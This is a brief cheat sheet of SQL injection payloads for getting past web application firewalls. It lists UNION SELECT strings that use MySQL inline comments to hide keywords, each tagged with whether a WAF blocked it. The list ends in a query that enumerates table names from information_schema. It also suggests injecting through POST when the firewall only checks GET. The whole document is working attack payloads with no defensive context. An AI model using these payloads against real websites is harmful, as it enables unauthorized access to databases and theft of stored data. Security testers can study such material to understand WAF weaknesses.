SQLi WAF Behaviours

1. when you try to access server with your SQL WAF will stop you again. You might have more luck if WAF controls only GET requests and you inject with POST...
2.  
3.  
4.  
5. SQLi Waf Behaviours
6.  
7.  
8. union select 1,2,3,4-- - [<---WAF
9.  
10. /*!union*/ select 1,2,3,4-- - [<--- No WAF
11.  
12. /*!union*/ select 1,group_concat(),3,4-- - [<--NO -WAF
13.  
14. /*!union*/ select 1,group_concat(table_name),3,4-- - [<---WAF
15.  
16. /*!union*/ select 1,group_concat(/*!table_name*/),3,4-- - [<--- No WAF
17.  
18. /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from -- - [<---No WAF
19.  
20. /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables-- - [<---No WAF
21.  
22. /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables where-- - [<---WAF
23.  
24. /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/-- - [<---No WAF
25.  
26. /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/ table_schema-- - [<---No WAF
27.  
28. /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/ table_schema=database()-- - [<---No WAF